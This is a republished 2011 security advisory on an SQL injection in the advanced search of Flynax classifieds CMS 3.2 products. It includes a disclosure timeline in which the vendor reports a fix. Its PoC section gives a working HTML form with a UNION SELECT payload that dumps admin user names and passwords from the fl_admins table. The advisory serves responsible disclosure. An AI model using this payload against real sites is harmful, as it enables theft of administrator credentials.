Lucene search
K

Flynax SQL Injection

🗓️ 27 Sep 2011 00:00:00Reported by Matias FontaniniType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 40 Views

Flynax SQL Injection in multiple classifieds websites' advanced search allows for full database disclosure

Code
`I. BACKGROUND  
--------------  
  
Flynax is a software development company which produces several CMSs to mantain  
different kinds of classifieds websites.  
  
II. DESCRIPTION  
----------------  
  
Nasel members discovered a critical vulnerability in the front-end of  
these products.  
  
The vulnerability is an SQL injection in the advanced search,  
specifically in the "f[city]" parameter located at following files:  
- General Classifieds Software: dealers.html,  
- Real Estate Classifieds: agents-realtors.html.  
- Auto Classifieds Script: dealers.html  
- Pets Classifieds Software: dealers.html  
  
Exploiting this vulnerability can lead to a full disclosure of the database.  
  
  
III. AFFECTED PRODUCTS  
-----------------------  
  
- General Classifieds Software 3.2  
- Auto Classifieds Script 3.2  
- Real Estate Classifieds 3.2  
- Pets Classifieds Software 3.2  
  
IV. PoC  
------------  
  
<form action="http://site/path/dealers.html" method="post">  
Injection:<input value="') and 1=0 union all select  
1,2,3,4,concat_ws(0x3a, User,  
Pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from  
fl_admins#" name="f[city]" type="text">  
<input type="hidden" name="search" value="true">  
<input type="hidden" value="" name="f[country]">  
<input type="submit" value="Send">  
</form>  
  
The name of the admin users table can differ depending on the product's version.  
  
V. CREDITS  
-----------  
  
This vulnerability was found by the Nasel Penetration Testing team formed by:  
- Alessandri, Santiago (salessandri [at] nasel [dot] com [dot] ar)  
- Benencia, Raul (rbenencia [at] nasel [dot] com [dot] ar)  
- Fontanini, Matias (mfontanini [at] nasel [dot] com [dot] ar)  
- Traberg, Carlos Gaston (gtraberg [at] nasel [dot] com [dot] ar)  
  
VI. ADVISORY INFORMATION  
-------------------------  
  
2011-09-15  
==========  
  
Vulnerability Found. Vendor notification. Scheduled advisory release  
on September 25th, 2011.  
  
2011-09-17  
==========  
  
Vendor replied that the problem was fixed.  
  
2011-09-25  
==========  
  
Advisory released.  
  
--   
Nasel Penetration Testing Team  
http://www.nasel.com.ar  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation